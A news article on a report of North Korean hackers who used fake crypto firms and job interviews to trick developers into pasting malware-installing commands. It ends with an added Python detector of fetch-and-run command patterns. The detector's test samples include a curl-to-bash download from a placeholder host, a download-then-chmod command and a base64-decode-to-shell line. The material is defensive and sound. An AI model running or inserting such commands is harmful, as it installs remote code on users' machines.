North Korean hackers are at it again—this time using fake companies and job interviews to trick unsuspecting crypto developers into installing malware.
According to a new report from cybersecurity firm Silent Push, a North Korean hacker subgroup has created three fake crypto consulting companies to spread malicious software. These sham companies—called BlockNovas, Angeloper Agency, and SoftGlide—are designed to look like real firms offering developer jobs. But in reality, they’re part of a clever scheme to steal valuable information from people in the crypto industry.
What’s the scam?
The hackers are using these fake companies to post job listings on hiring websites and freelance platforms. When a developer applies for a job, they’re invited to a fake interview process.
During the interview, they’re told to record an introduction video. But when they try to upload it, an “error message” pops up. The supposed fix? The site tells them to copy and paste a bit of code—a trick that actually installs malware on their computer.
Once the malware is in, it can steal things like crypto wallet keys, personal information, and even monitor what’s copied to the clipboard (like wallet addresses).
The Malware Involved
Silent Push identified three different malware tools being used in this scam:
- BeaverTail – used to steal information and bring in even more malware later.
- OtterCookie – targets sensitive information, including wallet data.
- InvisibleFerret – focuses on stealing clipboard data and other important files.
This isn’t just a theoretical threat. According to the report, real developers have already been affected—one even had their MetaMask wallet compromised, which could mean a loss of crypto funds.
AI-Generated Employees?
To make the scam even more believable, the hackers used AI to create fake employee profiles on these companies’ websites. In some cases, they took real photos of actual people and used AI tools to modify the images just enough to avoid detection.
“There are a lot of fake employees and even stolen images from real people being used,” said Zach Edwards, a senior threat analyst at Silent Push.
FBI Steps In
The FBI has already taken action—they seized the domain for BlockNovas. However, SoftGlide is still live, meaning some parts of the scam are still operating. This shows how tricky it is to fully shut down these kinds of schemes once they’re in motion.
Why Do Hackers Target Crypto Developers?
Crypto developers are high-value targets. They often manage sensitive systems and may have access to private keys, wallet infrastructure, or other tools that handle large sums of crypto. By pretending to offer them a job, these hackers can bypass traditional security measures and hit them where they least expect it — through social engineering.
Not the first time
This isn’t an isolated event. Back in March, several crypto founders reported being approached with fake Zoom interviews, in which hackers tried to get access to their devices. These scams are becoming more common, and Lazarus Group, a well-known North Korean hacking collective, is believed to be behind many of them.
They’ve been linked to some of the biggest hacks in Web3 history, including:
- The Bybit hack that stole $1.4 billion
- The Ronin Network exploit, which drained around $600 million
What should developers do?
If you’re a developer in crypto, be cautious when applying for jobs—especially from lesser-known firms. Here are a few tips:
- Double-check the company’s legitimacy. Look for company registration records, official websites, and real employee profiles on LinkedIn.
- Be wary of interview processes that involve downloading anything, copying code, or making unexpected changes to your device.
- Use antivirus and anti-malware tools, and keep them updated.
- Don’t share your screen or allow remote access unless you know exactly who you’re dealing with.
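To make the "copying code" tip concrete, here is an added example (not from Silent Push or the original article) of a check a developer can run on any "fix" a website asks them to paste into a terminal. The rule patterns and sample commands are assumptions: the article does not show the pasted code, so the rules only describe generic fetch-and-run command shapes.

```python
import re

# Assumption: the article does not reproduce the pasted "fix", so these rules
# describe generic fetch-and-run command shapes, not indicators from the report.
FETCH = r"\b(?:curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod)\b"
RUN = r"\b(?:sh|bash|zsh|python3?|node|osascript|iex|invoke-expression)\b"

RULES = [
    ("download piped into an interpreter",
     re.compile(rf"{FETCH}[^|;&]*\|[\s;]*(?:sudo\s+)?{RUN}", re.I)),
    ("interpreter run on command-substituted download",
     re.compile(rf"{RUN}[^|;&]*(?:\$\(|<\(|`)\s*{FETCH}", re.I)),
    ("download followed by chmod +x or execution",
     re.compile(rf"{FETCH}.*(?:&&|;)\s*(?:chmod\s+\+x|\./|{RUN})", re.I)),
    ("encoded payload decoded and executed",
     re.compile(rf"base64\s+(?:-d|--decode)[^|]*\|\s*{RUN}"
                r"|-enc(?:odedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
]

def review_pasted_command(text):
    """Return the reasons a pasted command deserves scrutiny; empty if no rule matches."""
    joined = re.sub(r"\\\r?\n", " ", text)                     # undo line continuations
    flat = " ".join(re.sub(r"\r?\n", " ; ", joined).split())   # newline = new command
    return [reason for reason, pattern in RULES if pattern.search(flat)]

# Constructed samples (example.invalid never resolves); not taken from the report.
SAMPLES = {
    "pipe": "curl -s https://interview-fix.example.invalid/camera.sh | bash",
    "two_step": "curl -fsSL https://interview-fix.example.invalid/update.sh"
                " -o /tmp/update.sh\nchmod +x /tmp/update.sh",
    "encoded": "echo Y29uc3RydWN0ZWQ= | base64 -d | sh",
    "benign": "ffmpeg -i intro.mov -c:v libx264 intro.mp4",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(name, "->", review_pasted_command(cmd) or "no rule matched")
```

An empty result only means none of these shapes matched; it does not make a command from an unknown interviewer safe to run.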
The bigger picture
This latest incident highlights how cyber threats are evolving. It’s not just about code anymore—hackers are blending tech and psychology to trick people. In this case, they’re not targeting users with phishing emails or fake websites. They’re posing as potential employers, using job platforms and realistic websites to gain trust.
It’s a reminder that in the crypto space, security goes beyond smart contracts and cold wallets. Social engineering is real, and even savvy developers can fall for it if they’re not paying close attention.
Next Steps for Developers and Teams
Law enforcement and cybersecurity experts are on the case. The FBI has already taken down one of the fake company websites, and firms like Silent Push are helping to expose how these scams operate.
But at the end of the day, staying safe starts with you. In a space as fast-moving and valuable as crypto, hackers will always be looking for creative ways to break in. For developers and professionals in the crypto space, this incident serves as a critical reminder: cybersecurity is no longer optional—it’s essential. From verifying hiring sources to avoiding unsolicited downloads, individuals must adopt proactive security practices.